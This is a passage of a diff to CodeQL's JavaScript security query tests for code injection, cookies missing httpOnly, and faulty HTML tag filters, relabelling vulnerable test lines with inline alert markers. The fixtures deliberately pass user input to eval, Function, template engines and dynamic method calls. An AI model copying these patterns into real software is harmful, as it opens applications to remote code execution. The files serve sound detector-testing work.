function (data) { - return eval("(" + data + ")"); // NOT OK +global.unsafeDeserialize = function (data) { // $ Source[js/unsafe-code-construction] + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); -export function greySink(data) { +export function greySink(data) { // $ Source[js/unsafe-code-construction] const str = ` ---js - ${data} + ${data /* $ Alert[js/unsafe-code-construction] */} --- ` const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js @@ -6,7 +6,7 @@ var app = express(); app.get('/some/path', function (req, res) { let filename = req.query.filename; var m = new Module(filename, module.parent); - m._compile(req.query.code, filename); // NOT OK + m._compile(req.query.code, filename); // $ Alert[js/code-injection] var m2 = new module.constructor; - m2._compile(req.query.code, filename); // NOT OK + m2._compile(req.query.code, filename); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js index 0a9edc1ebe9c..dc2f5e8ec729 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js @@ -4,8 +4,8 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); - ; // NOT OK + let tainted = req.param("code"); // $ Source[js/code-injection] + ; // $ Alert[js/code-injection] let wv = ; - wv.injectJavaScript(tainted); // NOT OK + wv.injectJavaScript(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js index 54047c6f3cbd..32db7a3f621a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
    My unsafe - + {/* $ Alert[js/code-injection] */}
    ); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js index 51554663e4ee..73f75c703201 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js @@ -15,20 +15,20 @@ import * as webix from "webix"; var app = express(); app.get('/some/path', function (req, res) { - let tainted = req.query.foo; + let tainted = req.query.foo; // $ Source[js/code-injection] - pug.compile(tainted); // NOT OK - pug.render(tainted); // NOT OK - jade.compile(tainted); // NOT OK - jade.render(tainted); // NOT OK - dot.template(tainted); // NOT OK - ejs.render(tainted); // NOT OK - nunjucks.renderString(tainted); // NOT OK - lodash.template(tainted); // NOT OK - dot.compile(tainted); // NOT OK - handlebars.compile(tainted); // NOT OK - mustache.render(tainted); // NOT OK - Hogan.compile(tainted); // NOT OK - Eta.render(tainted); // NOT OK - Sqrl.render(tainted); // NOT OK + pug.compile(tainted); // $ Alert[js/code-injection] + pug.render(tainted); // $ Alert[js/code-injection] + jade.compile(tainted); // $ Alert[js/code-injection] + jade.render(tainted); // $ Alert[js/code-injection] + dot.template(tainted); // $ Alert[js/code-injection] + ejs.render(tainted); // $ Alert[js/code-injection] + nunjucks.renderString(tainted); // $ Alert[js/code-injection] + lodash.template(tainted); // $ Alert[js/code-injection] + dot.compile(tainted); // $ Alert[js/code-injection] + handlebars.compile(tainted); // $ Alert[js/code-injection] + mustache.render(tainted); // $ Alert[js/code-injection] + Hogan.compile(tainted); // $ Alert[js/code-injection] + Eta.render(tainted); // $ Alert[js/code-injection] + Sqrl.render(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js index 5b51da5daf26..f2ef50335647 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js @@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert[js/code-injection] + +setTimeout(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert[js/code-injection] -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert[js/code-injection] -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert[js/code-injection] -// NOT OK -$('    ').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert[js/code-injection] (function test() { - var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); + var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); // $ Source[js/code-injection] - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html @@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js @@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref index edaea6fbb219..dd00277b79b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/ExpressionInjection/ExpressionInjection.qlref @@ -1 +1 @@ -Security/CWE-094/ExpressionInjection.ql +query: Security/CWE-094/ExpressionInjection.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected index 8511b6bcaf69..bddb28457097 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.expected @@ -1,3 +1,10 @@ +#select +| example.js:13:5:13:24 | window[message.name] | example.js:9:37:9:38 | ev | example.js:13:5:13:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | example.js:9:37:9:38 | ev | user-controlled value | +| tst.js:5:5:5:24 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:5:5:5:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:6:9:6:28 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:6:9:6:28 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:11:5:11:19 | f[message.name] | tst.js:3:37:3:38 | ev | tst.js:11:5:11:19 | f[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:15:5:15:14 | window[ev] | tst.js:3:37:3:38 | ev | tst.js:15:5:15:14 | window[ev] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | +| tst.js:21:5:21:29 | window[ ... e.name] | tst.js:3:37:3:38 | ev | tst.js:21:5:21:29 | window[ ... e.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | edges | example.js:9:37:9:38 | ev | example.js:10:30:10:31 | ev | provenance | | | example.js:10:9:10:37 | message | example.js:13:12:13:18 | message | provenance | | @@ -55,10 +62,3 @@ nodes | tst.js:21:17:21:23 | message | semmle.label | message | | tst.js:21:17:21:28 | message.name | semmle.label | message.name | subpaths -#select -| example.js:13:5:13:24 | window[message.name] | example.js:9:37:9:38 | ev | example.js:13:5:13:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | example.js:9:37:9:38 | ev | user-controlled value | -| tst.js:5:5:5:24 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:5:5:5:24 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:6:9:6:28 | window[message.name] | tst.js:3:37:3:38 | ev | tst.js:6:9:6:28 | window[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:11:5:11:19 | f[message.name] | tst.js:3:37:3:38 | ev | tst.js:11:5:11:19 | f[message.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:15:5:15:14 | window[ev] | tst.js:3:37:3:38 | ev | tst.js:15:5:15:14 | window[ev] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | -| tst.js:21:5:21:29 | window[ ... e.name] | tst.js:3:37:3:38 | ev | tst.js:21:5:21:29 | window[ ... e.name] | This method is invoked using a $@, which may allow remote code execution. | tst.js:3:37:3:38 | ev | user-controlled value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref index 5c4a993df5a7..15581f63a99c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/UnsafeDynamicMethodAccess.qlref @@ -1 +1,2 @@ -Security/CWE-094/UnsafeDynamicMethodAccess.ql +query: Security/CWE-094/UnsafeDynamicMethodAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..e0be4ba3cb29 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -6,9 +6,9 @@ function pause(data) { // ... } -window.addEventListener("message", (ev) => { +window.addEventListener("message", (ev) => { // $ Source let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..632249037b21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js @@ -1,22 +1,22 @@ let obj = {}; -window.addEventListener('message', (ev) => { +window.addEventListener('message', (ev) => { // $ Source let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected index b8b29a028c25..f520dd88e972 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.expected @@ -1,8 +1,8 @@ -| tst-httpOnly.js:11:9:15:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:11:9:15:2 | session ... alse\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:29:9:29:21 | session(sess) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:38:9:38:22 | session(sess2) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:47:9:47:22 | session(sess3) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:51:9:55:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:51:9:55:2 | session ... lag2\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:68:5:73:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:78:5:81:10 | res.coo ... }) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:101:5:101:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | @@ -12,9 +12,9 @@ | tst-httpOnly.js:148:5:148:41 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:159:5:159:43 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | | tst-httpOnly.js:170:5:170:40 | res.coo ... ptions) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:209:37:209:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:229:38:229:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:289:37:289:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:303:9:307:2 | session ... BAD\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:320:9:324:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | -| tst-httpOnly.js:330:37:330:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:208:37:208:51 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:227:38:227:52 | "authKey=ninja" | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:287:37:287:59 | `authKe ... {attr}` | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:301:9:305:2 | session ... se }\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:318:9:322:2 | session ... tter\\n}) | Sensitive server cookie is missing 'httpOnly' flag. | +| tst-httpOnly.js:328:37:328:68 | "sessio ... onKey() | Sensitive server cookie is missing 'httpOnly' flag. | diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref index 683e1cd46985..85a4e780c1a9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-1004/ClientExposedCookie.qlref @@ -1 +1,2 @@ -Security/CWE-1004/ClientExposedCookie.ql +query: Security/CWE-1004/ClientExposedCookie.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..681b3e2382a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js @@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD -})) + httpOnly: false +})) // $ Alert app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD -})) + httpOnly: flag2 +})) // $ Alert app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') @@ -68,9 +68,9 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, secure: false - }); + }); // $ Alert res.end('ok') }) @@ -78,14 +78,14 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000 - }); - res.end('ok') // BAD + }); // $ Alert + res.end('ok') }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); @@ -95,10 +95,10 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, secure: false } - res.cookie('authkey', 'value', options); + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD -})) + cookie: { httpOnly: false } +})) // $ Alert app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) @@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter -})) + cookie: { httpOnly: false } // It is a session cookie, name doesn't matter +})) // $ Alert const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref index e5fc84fd48a9..443c007de0cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.qlref @@ -1 +1,2 @@ -Security/CWE-116/BadTagFilter.ql +query: Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - 